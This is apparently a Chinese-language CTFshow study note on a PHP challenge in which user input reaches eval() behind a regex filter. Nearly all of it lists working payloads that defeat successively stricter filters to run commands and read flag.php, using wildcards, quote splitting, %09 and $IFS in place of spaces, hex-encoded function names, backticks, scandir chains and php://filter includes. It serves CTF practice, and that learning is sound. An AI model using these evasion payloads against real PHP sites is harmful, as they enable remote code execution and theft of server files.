CTFSHOW-文件上传

**************************************************************************************************************

GET传参-例题

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("过滤的内容", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
 

过滤的内容

/flag/i

?c=system("cat fla?.php");
?c=system("cat fla''g.php");
?c=system("cat fla\g.php");
?c=echo `nl fl''ag.php`;
?c=eval($_GET[1]);&1=system('cat flag.php');//也可tac

/flag|system|php/i

?c=passthru('tac f*');
?c=echo `tac *`;
?c=echo  exec('nl fl?g.???');
?c=echo  shell_exec('nl fl?g.???');//此函数与反引号异曲同工
?c=passthru("nl fl''ag.ph''p");//各种通配符的使用
?c=eval($_GET[1]);&1=system('cat flag.php');

/flag|system|php|cat|sort|shell|\.| |\'/i

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));//预期
?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
?c=print_r(`nl%09fl[abc]*`);
?c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*");//等价于system(),说明双引号会自动解析
?c=echo`strings%09f*`;//在对象文件或二进制文件中查找可打印的字符串
?c=echo`strings\$IFS\$9f*`//必须加转义字符
?c=passthru("nl%09`ls`");//空格%09绕过
?c=eval($_GET[1]);&1=system('cat flag.php');//还是可以

/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i
即过滤了flag，system，php，cat，sort，shell，.（点），
（空格），’（单引号），`（反引号），echo，；（分号），（（左括号）

c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
或者POST：
?c=include$_POST[a]?>

post:a=php://filter/read=convert.base64-encode/resource=flag.php
 

**************************************************************************************************************